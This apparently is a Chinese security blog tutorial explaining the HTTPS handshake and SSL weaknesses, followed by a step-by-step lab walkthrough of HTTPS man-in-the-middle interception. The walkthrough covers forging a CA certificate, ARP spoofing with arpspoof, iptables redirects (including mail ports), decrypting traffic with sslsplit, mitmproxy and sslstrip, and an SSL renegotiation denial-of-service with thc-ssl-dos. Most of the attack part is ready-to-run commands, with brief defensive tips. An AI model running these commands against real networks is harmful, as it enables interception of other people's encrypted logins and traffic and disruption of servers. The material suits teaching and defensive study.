全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家

 

0x01:https的作用

  C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源)

  解决的是信息传输中数据被篡改。窃取

  加密:对称、非对称、单向

 

0x02:https工作原理

https的工作原理还是有必要研究下的(原理我也是从网上学习总结的,感谢这些前辈)

wKioL1g5rU7CngJFAADmPfyL5nk157.png

1. 客户端发起HTTPS请求

用户在浏览器里输入一个https网址,然后连接到server的443端口。

 

2. 服务端的配置

采用HTTPS协议的服务器必须要有一套数字证书,可以自己制作,也可以向组织申请。区别就是自己颁发的证书需要客户端验证通过,才可以继续访问,而使用受信任的公司申请的证书则不会弹出提示页面


web通信中的SSL加密的公钥证书(受信任的第三方证书颁发机构签名颁发)常见的如

  VeriSign

  Thawte 

  GlobalSign

  Symantec

 

3. 传送证书

这个证书其实就是公钥,只是包含了很多信息,如证书的颁发机构,过期时间等等。

 

4. 客户端解析证书

这部分工作是有客户端的TLS来完成的,首先会验证公钥是否有效,比如颁发机构,过期时间等等,如果发现异常,则会弹出一个警告框,提示证书存在问题。如果证书没有问题,那么就生成一个随即值。然后用证书对该随机值进行加密。

 

5. 传送加密信息

这部分传送的是用证书加密后的随机值,目的就是让服务端得到这个随机值,以后客户端和服务端的通信就可以通过这个随机值来进行加密解密了。

 

6. 服务段解密信息

服务端用私钥解密后,得到了客户端传过来的随机值(私钥),然后把内容通过该值进行对称加密。所谓对称加密就是,将信息和私钥通过某种算法混合在一起,这样除非知道私钥,不然无法获取内容,而正好客户端和服务端都知道这个私钥,所以只要加密算法够彪悍,私钥够复杂,数据就够安全。

 

7. 传输加密后的信息

这部分信息是服务段用私钥加密后的信息,可以在客户端被还原

 

8. 客户端解密信息

客户端用之前生成的私钥解密服务段传过来的信息,于是获取了解密后的内容。整个过程第三方即使监听到了数据,也束手无策。

 

大概过程如下:

握手——协商加密算法——获得公钥证书——验证公钥证书——交换会话密钥——加密信息传输

 

 

0x03:SSL的弱点

1.ssl是不同的对称、非对称、单向加密算法的组合加密实现(cipher suite)

如密钥交换、身份验证使用RAS/Diffie-Hellman,加密数据,使用AES加密,有RAS/DH完成密钥交换,摘要信息由HMAC-SHA2,组成了一个cipher suite,当然,也可以是其他组合。

2.服务器端为提供更好的兼容性,选择支持大量过时的cipher suite。

3.协商过程中强迫降级加密强度。

4.现代处理器计算能力可以在接收的时间内破解过时加密算法。

5.***购买云计算资源破解。

 

0x04:HTTPS常见***方式

针对其弱点,常见的https***方法有

  降级***(把高安全级别的加密算法强制降成低安全级别的加密算法)

  解密***(明文、证书伪造)

  协议漏洞、实现方法的漏洞、配置不严格

 


0x05:HTTPS证书查看

在进行中间人***之前,先查看下证书,可以使用以下软件(以百度为例)

1、OpenSSL 

OpenSSL是一个安全套接字层密码库,囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议,并提供丰富的应用程序供测试或其它目的使用。

 

直接调用openssl库识别目标服务器支持的SSL/TLS cipher suite

openssl s_client -connect www.baidu.com:443

wKiom1g5rXyzmJWEAAevtOWwSGw133.png

wKioL1g5rZvQ5KuzAAWWy1HdlMY755.png


2、sslcan 

SSLscan主要探测基于ssl的服务,如https。SSLscan是一款探测目标服务器所支持的SSL加密算法工具。

sslcan能自动识别ssl配置错误,过期协议,过时cipher suite和hash算法

默认会检查CRIME、heartbled漏洞,绿色表示安全、红色黄色需要引起注意

  sslscan -tlsall www.baidu.com:443

wKioL1g5rbvR_5AqAAQb5DiDS0s695.png

分析证书详细数据

sslscan -show-certificate --no-ciphersuites www.baidu.com:443

wKiom1g5rdvQridkAAOGYX6ogd0377.png

3、nmap

还可以使用nmap的脚本。

nmap --script=ssl-enum-ciphers.nse www.baidu.com

wKioL1g5rf7z77vWAAX-Qk9mO3I154.png


0x06、https中间人***


1、先生成一个证书。

openssl req -new -x509 -days 1096 -key ca.key -out ca.crt,进行一个新的请求,格式为-x509,现在的证书基本是x509的国际标准的证书格式,有效期为1096天,并使用ca.key私钥,生成ca.crt标准的证书文件。

wKioL1g5rh6i2EkKAATgBJsKdWw775.png


sslsplit会自动的调用根证书,根据你要访问哪些网站,根据网站的名称,由根证书签发一个专门针对网站的证书。

 

2.开启路由功能

中间人也是个终端设备,不具有路由功能,转发过程不是由软件实现的,是由操作系统的路由功能实现的。

sysctl -w net.ipv4.ip_forward=1,将net.ipv4.ip_forward=1的值设为1,当然用输出重定向或者vim编辑proc/sys/net/ipv4/ip_forward也可。

wKioL1g5rjnRgjGrAAE88akQZG4132.png


3.写转发规则

iptables端口转发规则

当客户端把请求发给中间人终端设备的时候,发到终端的443端口之后,需要用iptablesNAT地址转换,其实是端口转换,把本地443端口收到的包转发到另外一个端口,而另外一个端口由sslsplit所侦听的端口,这样的话,凡是发给443端口的请求流量就会发给slsplit所侦听的端口,而sslsplit就会调用证书伪造一个看起来是目标网站的伪造网站,sslsplit会利用伪造的证书对发过来的流量进行解密

 

iptables -t nat -L 查看net的配置,为避免干扰,可以使用iptables -F清空配置,并使用netstat -pantu | grep :80 netstat -pantu | grep :443检查80443是否被使用,使用则停止进程

 wKiom1g5rlqBmcK_AACv3jYkVpc625.png

80443端口进行转发给80808443端口。

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

当然还可以对其他的协议的加密流量进行中间人***。

iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443  //MSA

iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443  //SMTPS

iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443  //IMAPS

iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443  //POP3S

wKioL1g5rnnwJTKQAAdmcp1z2C0422.png


4.进行arp欺骗

使用arpspoof进行arp欺骗,不管是进行DNS欺骗还是HTTP或HTTPS的中间人***,arp欺骗都是前提,所以,在进行防御的时候,将ip和MAC绑定,就可以防止中间人***了。


arpspoof -i eth0 -t 192.168.1.127 -r 192.168.1.1 (以下展示的实验环境的地址)

 
wKiom1g5rpqguOwEAAA5epj-2Go433.png

wKiom1g5rrXAnK1HAAn9o2dpnT8510.png

能看到网关的arp已经变成了kalimac地址了。

wKioL1g5rs_j9ONHAAAZmN6phRY707.png


5、进行监听

sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080-D 表示debug-l表示把连接请求记录到一个文件中,不是数据信息,只是连接信息,-j越狱的根目录,-S请求的数据,放在-j指定的目录下的目录,如root/test/logdir,所以得先建立这个几个目录,-k指定私钥,-c指定私钥签发的证书,ssl的流量加密的流量在本地的所有ip地址侦听8443端口,不加密的普通的tcp流量在本地的8080端口侦听。

wKioL1g5rvGDoC-dAAlQaHo-src973.png


6、验证

在客户端验证。本地电脑默认集成证书服务器的根证书,是不信任我们伪造的证书,所以在访问淘宝的时候,看到有这样的提示,就是有问题的。

wKiom1g5rwuQGumRAAD1zkDX9Bg953.png

登录验证并查看证书。

wKiom1g5ryPDzY0dAAB2j4Ehntg004.png

wKioL1g5rzjBL4z5AAA2N9ilG-A297.png

查看连接信息。

wKioL1g5r1qymCH1AAMP7T-PfS4059.png


查看数据信息。

wKioL1g5r3-ABlTzAAh2C-SWMRM006.png

查看到https加密后的信息已经被解密。

wKiom1g5r5mBewn1AAKEpZwfhfM033.png


我们就可以劫持https的流量了,但是会提示网站证书会报错,解决方法是将根证书安装到客户端,再次访问就不会报根证书的问题了。访问的任何东西就会被没有告警的记录下来。所以在看到访问网站证书报错的情况下,需要格外注意。

wKiom1g5r7XjD0v8AAJMJw3977k742.png



除了sslsplit进行监听,还可以使用Mitmproxy进行中间人***,同前面的步骤相同,仍然需要伪造证书,进行arp欺骗,但不需要指定监听的端口,默认监听8080端口,可以对默认的端口进行修改。

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

 

启动Mitmproxy

mitmproxy -T --host -w mitmproxy.log,不但能进行监控,每个具体的数据可以打开查看详细的请求。

wKioL1g5r9DTo_vTAAFxBQDR34Q180.png



还可以使用SSLstrip进行监听,与前两种工具不同,将客户端到中间人的流量变为明文。需要arp欺骗,不需要生成伪造证书,只需写iptables规则,并让sslstrip 监听某一个端口。

sslstrip -l 8080


 


0x07、ssl/TLS拒绝服务***

ssl/TLS拒绝服务***的原理及特性:

1、SSL协商加密对性能开销增加,大量握手请求会导致拒绝服务。

2、利用ssl sevure renegotiation 特性,在单一TCP连接中生成数千个SSL重连接请求,造成服务器资源过载。

3、与流量式拒绝服务***不同,thc-ssl-dos可以利用dsl线路打垮30G带宽的服务器

4、对SMTPSPOP3S等服务同样有效



可以使用德国***组织“The Hacker’s Choice”发布了工具THC SSL DOS、


thc-ssl-dos ip 端口 --accept--accept是作者强制要求加的参数,不加此参数回提示你这个服务器是你的服务器吗,不是你的服务器就不要进行测试,--accept只有接收确认是自己的服务器,才可以使用这个工具去发起ssl重连接的握手请求。


wKioL1g5r_LAZZciAAEpiF7307E704.png


对策

禁用SSL-Renegotoation、使用SSL Accelerator(不过可以通过修改thc-ssl-dos代码,可以绕过以上对策)